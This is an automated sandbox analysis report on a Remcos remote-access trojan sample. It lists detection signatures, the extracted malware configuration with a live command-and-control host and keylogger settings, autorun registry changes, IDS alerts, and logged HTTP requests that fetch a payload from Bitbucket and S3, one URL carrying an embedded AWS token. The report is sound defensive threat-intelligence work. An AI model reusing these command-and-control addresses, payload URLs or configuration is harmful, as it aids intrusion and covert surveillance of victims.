Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3XSXmrEOw7.exe

Overview

General Information

Sample name:3XSXmrEOw7.exe
renamed because original name is a hash value
Original sample name:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Analysis ID:1573895
MD5:ddce3b9704d1e4236548b1a458317dd0
SHA1:a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3XSXmrEOw7.exe (PID: 5524 cmdline: "C:\Users\user\Desktop\3XSXmrEOw7.exe" MD5: DDCE3B9704D1E4236548B1A458317DD0)
    • csc.exe (PID: 5776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • yjfesx.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\yjfesx.exe MD5: 27650AFE28BA588C759ADE95BF403833)
    • yjfesx.exe (PID: 768 cmdline: "C:\Users\user\AppData\Local\Temp\yjfesx.exe" MD5: 27650AFE28BA588C759ADE95BF403833)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.csc.exe.8036e08.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.csc.exe.9880000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                5.2.yjfesx.exe.5b30000.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  5.2.yjfesx.exe.5b30000.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    5.2.yjfesx.exe.5b30000.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 25 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3XSXmrEOw7.exe, ProcessId: 5524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:42:16.545424+010020327761Malware Command and Control Activity Detected192.168.2.549831181.131.217.2441842TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:42:17.820688+010020327771Malware Command and Control Activity Detected181.131.217.2441842192.168.2.549831TCP
                      2024-12-12T17:44:20.335417+010020327771Malware Command and Control Activity Detected181.131.217.2441842192.168.2.549831TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:42:19.877289+010028033043Unknown Traffic192.168.2.549836178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 3XSXmrEOw7.exeAvira: detected
                      Found malware configuration
                      Source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}
                      Multi AV Scanner detection for submitted file
                      Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: yjfesx.exe, 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3d0bf4d2-6

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR

                      Compliance

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeUnpacked PE file: 0.2.3XSXmrEOw7.exe.2420000.2.unpack
                      Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.231.203.105:443 -> 192.168.2.5:49743 version: TLS 1.2
                      Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000080AD000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994615289.0000000009700000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49831 -> 181.131.217.244:1842
                      Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1842 -> 192.168.2.5:49831
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: newstaticfreepoint24.ddns-ip.net
                      Source: global trafficTCP traffic: 192.168.2.5:49729 -> 181.131.217.244:30203
                      Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6lqogmU0NyZY9bZyJ4%2BwRjnbrHuOJtTOOxuSqcBPZRUcYiqA%2FuQ%3D%3D&Expires=1734023353 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
                      Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49836 -> 178.237.33.50:80
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6lqogmU0NyZY9bZyJ4%2BwRjnbrHuOJtTOOxuSqcBPZRUcYiqA%2FuQ%3D%3D&Expires=1734023353 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: csc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/$
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: yjfesx.exe, 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A13000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpz
                      Source: csc.exe, 00000003.00000002.3991731167.0000000004F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cC
                      Source: csc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: csc.exe, 00000003.00000002.3992663991.00000000071CB000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: csc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drString found in binary or memory: http://www.hdsentinel.com
